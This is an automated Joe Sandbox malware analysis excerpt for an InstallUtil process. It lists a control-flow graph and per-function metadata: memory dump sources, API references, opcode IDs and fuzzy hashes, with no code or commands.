                                                                                                                                                                                                control_flow_graph 1711 6699548-6699577 1713 6699579 1711->1713 1714 669957e-6699614 LdrInitializeThunk 1711->1714 1713->1714 1715 66996b3-66996b9 1714->1715 1716 6699619-669962c 1715->1716 1717 66996bf-66996d7 1715->1717 1718 669962e 1716->1718 1719 6699633-6699684 1716->1719 1720 66996d9-66996e6 1717->1720 1721 66996eb-66996fe 1717->1721 1718->1719 1738 6699697-66996a9 1719->1738 1739 6699686-6699694 1719->1739 1722 6699a81-6699b7e 1720->1722 1723 6699700 1721->1723 1724 6699705-6699721 1721->1724 1729 6699b80-6699b85 1722->1729 1730 6699b86-6699b90 1722->1730 1723->1724 1726 6699728-669974c 1724->1726 1727 6699723 1724->1727 1733 669974e 1726->1733 1734 6699753-6699785 1726->1734 1727->1726 1729->1730 1733->1734 1743 669978c-66997ce 1734->1743 1744 6699787 1734->1744 1740 66996ab 1738->1740 1741 66996b0 1738->1741 1739->1717 1740->1741 1741->1715 1746 66997d0 1743->1746 1747 66997d5-66997de 1743->1747 1744->1743 1746->1747 1748 6699a06-6699a0c 1747->1748 1749 66997e3-6699808 1748->1749 1750 6699a12-6699a25 1748->1750 1753 669980a 1749->1753 1754 669980f-6699846 1749->1754 1751 6699a2c-6699a47 1750->1751 1752 6699a27 1750->1752 1755 6699a49 1751->1755 1756 6699a4e-6699a62 1751->1756 1752->1751 1753->1754 1762 6699848 1754->1762 1763 669984d-669987f 1754->1763 1755->1756 1760 6699a69-6699a7f LdrInitializeThunk 1756->1760 1761 6699a64 1756->1761 1760->1722 1761->1760 1762->1763 1765 6699881-66998a6 1763->1765 1766 66998e3-66998f6 1763->1766 1769 66998a8 1765->1769 1770 66998ad-66998db 1765->1770 1767 66998f8 1766->1767 1768 66998fd-6699922 1766->1768 1767->1768 1773 6699931-6699969 1768->1773 1774 6699924-6699925 1768->1774 1769->1770 1770->1766 1775 669996b 1773->1775 1776 6699970-66999d1 call 6699328 1773->1776 1774->1750 1775->1776 1782 66999d8-66999fc 1776->1782 1783 66999d3 1776->1783 1786 66999fe 1782->1786 1787 6699a03 1782->1787 1783->1782 1786->1787 1787->1748
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000005.00000002.2998472117.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_6690000_InstallUtil.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                • Opcode ID: 4cc4fdd0ed5ed4b4a4f16e1d259b4c11c978a8a08256ae249a55247f2f927b80
                                                                                                                                                                                                • Instruction ID: 7f61626e76caf6bbd1e9fc0858ae14768c68b10d5ad29846d8803721351308b0
                                                                                                                                                                                                • Opcode Fuzzy Hash: 4cc4fdd0ed5ed4b4a4f16e1d259b4c11c978a8a08256ae249a55247f2f927b80
                                                                                                                                                                                                • Instruction Fuzzy Hash: AFF1F774D01218CFDB54DFA9C884B9DBBB6BF88304F14C2A9E808AB355DB75A985CF50
                                                                                                                                                                                                Function 06699328 Relevance: 1.8, APIs: 1, Instructions: 263libraryCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000005.00000002.2998472117.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_6690000_InstallUtil.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                • Opcode ID: 63a08f2154ade6b07c485d2637584af5f161d78eca48c86663b33901ce8ccd41
                                                                                                                                                                                                • Instruction ID: baea70767457a41afdaabfea136132e0d73a2546f1dc0ec92c19f7dfe77c90d9
                                                                                                                                                                                                • Opcode Fuzzy Hash: 63a08f2154ade6b07c485d2637584af5f161d78eca48c86663b33901ce8ccd41
                                                                                                                                                                                                • Instruction Fuzzy Hash: 6C91C571E006188BDF55DFBAC9546ADBEF6AF85310F18862DD815AB390DB344D02CBA1
                                                                                                                                                                                                Function 06690B30 Relevance: .7, Instructions: 709COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000005.00000002.2998472117.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_6690000_InstallUtil.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 853c69d06cf0d038ad36be5d998bd4d4e75da59ef887e6a45665d152216509a5
                                                                                                                                                                                                • Instruction ID: 0c839dc48013f7db1badbacb058c7ea974381afb59a3eb26904458dc21824dee
                                                                                                                                                                                                • Opcode Fuzzy Hash: 853c69d06cf0d038ad36be5d998bd4d4e75da59ef887e6a45665d152216509a5
                                                                                                                                                                                                • Instruction Fuzzy Hash: 4472CF74E012298FDB64DF69C994BE9BBB2BB49304F2481E9D80DA7355DB309E81CF50
                                                                                                                                                                                                Function 06692968 Relevance: .3, Instructions: 268COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000005.00000002.2998472117.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_6690000_InstallUtil.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 49c905f819ee55e3e6bd19d168907caf818f18b30777b2eda0b3063621c48957
                                                                                                                                                                                                • Instruction ID: 4743680795bcacc48e751729afa20bfda28af80d71803d343cff2bc4d8bad6a6
                                                                                                                                                                                                • Opcode Fuzzy Hash: 49c905f819ee55e3e6bd19d168907caf818f18b30777b2eda0b3063621c48957
                                                                                                                                                                                                • Instruction Fuzzy Hash: ADC1D278E00258CFDB54DFA9C994B9DBBB2BF88305F1081A9E809AB354DB345E81CF10
                                                                                                                                                                                                Function 0669992C Relevance: 1.6, APIs: 1, Instructions: 62libraryCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • LdrInitializeThunk.NTDLL(00000000), ref: 06699A6E
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000005.00000002.2998472117.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_6690000_InstallUtil.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                • Opcode ID: b53924f8af3b3b1c77d969f35651b9c55cf9d540493b904c75acffef512a37a3
                                                                                                                                                                                                • Instruction ID: 4ce3999a6d6d0f01816a6b8f585e83261856743929ced30ef40a8c57d88b7d05
                                                                                                                                                                                                • Opcode Fuzzy Hash: b53924f8af3b3b1c77d969f35651b9c55cf9d540493b904c75acffef512a37a3
                                                                                                                                                                                                • Instruction Fuzzy Hash: 21113A74E011098FDF44DBA9D894AADBBF9FB88314F188269E804AB345DB31E941CB60
                                                                                                                                                                                                Function 013BD468 Relevance: .1, Instructions: 75COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000005.00000002.2990170808.00000000013BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013BD000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_13bd000_InstallUtil.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 17d47889430f1869d9a3408af621581cb75aafdfe590e9b04db4d63afb49fb85
                                                                                                                                                                                                • Instruction ID: 03878c32cb8d9f8f1d5d4e6a5cb8a099ac6ccbaf07f8654660d1ad56cb2a2ab4
                                                                                                                                                                                                • Opcode Fuzzy Hash: 17d47889430f1869d9a3408af621581cb75aafdfe590e9b04db4d63afb49fb85
                                                                                                                                                                                                • Instruction Fuzzy Hash: 63216A71504204DFCB05DF54D9C0BA6BF65FB9832CF24C56DDA0A0BA56D33AE416C7A1
                                                                                                                                                                                                Function 013BD554 Relevance: .1, Instructions: 75COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000005.00000002.2990170808.00000000013BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013BD000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_13bd000_InstallUtil.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 497f4f785e04f9b8760a7c9e04fdca785089b7bc92630409e2d79ff61fed98d1
                                                                                                                                                                                                • Instruction ID: 854d55d36cd6111ecd8ab9d6aa77aec4c2b60d43532e96bb349d36d64ecb30b8
                                                                                                                                                                                                • Opcode Fuzzy Hash: 497f4f785e04f9b8760a7c9e04fdca785089b7bc92630409e2d79ff61fed98d1
                                                                                                                                                                                                • Instruction Fuzzy Hash: FB214871504204DFCB05DF58D8C0F66BF65FB8832CF20C569EA090BA46D336D416CBA1
                                                                                                                                                                                                Function 029ED044 Relevance: .1, Instructions: 72COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000005.00000002.2990294019.00000000029ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 029ED000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_29ed000_InstallUtil.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 648008beee6d7a7dfeff7325041cd28a8d7da5bcf44cf22bc43f6b35fd3adb1b
                                                                                                                                                                                                • Instruction ID: 560b37d3eec6ab5e46e06801b2e343f2527e1921959d22f48fcc9a6e7e28cfe8
                                                                                                                                                                                                • Opcode Fuzzy Hash: 648008beee6d7a7dfeff7325041cd28a8d7da5bcf44cf22bc43f6b35fd3adb1b
                                                                                                                                                                                                • Instruction Fuzzy Hash: 1021F5716042049FDF16DF14C9C4B26BBA9FB84315F28C96DE84B4B381C736D446CA71
                                                                                                                                                                                                Function 013BD463 Relevance: .1, Instructions: 56COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000005.00000002.2990170808.00000000013BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013BD000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_13bd000_InstallUtil.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 3d7739f24a7f613363dc0741c1dd4920fb0d2c4cd1d09143030fc2081c46ff73
                                                                                                                                                                                                • Instruction ID: 32c119eaf40e8e633d6925f650b7a9d23dc64e994d8cf106b44d1e72106b1791
                                                                                                                                                                                                • Opcode Fuzzy Hash: 3d7739f24a7f613363dc0741c1dd4920fb0d2c4cd1d09143030fc2081c46ff73
                                                                                                                                                                                                • Instruction Fuzzy Hash: 08110376504240CFCB02CF54D5C4B56BF72FB84328F24C5AAD90A0B657C336D45ACBA2
                                                                                                                                                                                                Function 013BD54F Relevance: .1, Instructions: 56COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000005.00000002.2990170808.00000000013BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013BD000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_13bd000_InstallUtil.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 3d7739f24a7f613363dc0741c1dd4920fb0d2c4cd1d09143030fc2081c46ff73
                                                                                                                                                                                                • Instruction ID: c0f7d900dc74acbb05c50f3d3c7d587982c0c361bdedb24e0bc1af3bcb1eac28
                                                                                                                                                                                                • Opcode Fuzzy Hash: 3d7739f24a7f613363dc0741c1dd4920fb0d2c4cd1d09143030fc2081c46ff73
                                                                                                                                                                                                • Instruction Fuzzy Hash: B4110376904280CFCB06CF44D5C4B56BF72FB84328F24C5A9D9090B657C33AD45ACBA2
                                                                                                                                                                                                Function 029ED03F Relevance: .1, Instructions: 53COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000005.00000002.2990294019.00000000029ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 029ED000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_29ed000_InstallUtil.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
                                                                                                                                                                                                • Instruction ID: d15d135d83613b834d51f87cd967aa95b7431331d2c8960d037c2863330e3219
                                                                                                                                                                                                • Opcode Fuzzy Hash: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
                                                                                                                                                                                                • Instruction Fuzzy Hash: 5B11BB75504284CFCB16CF10C9C4B15BBA6FB88324F28C6A9D84A4B292C33AD44ACB62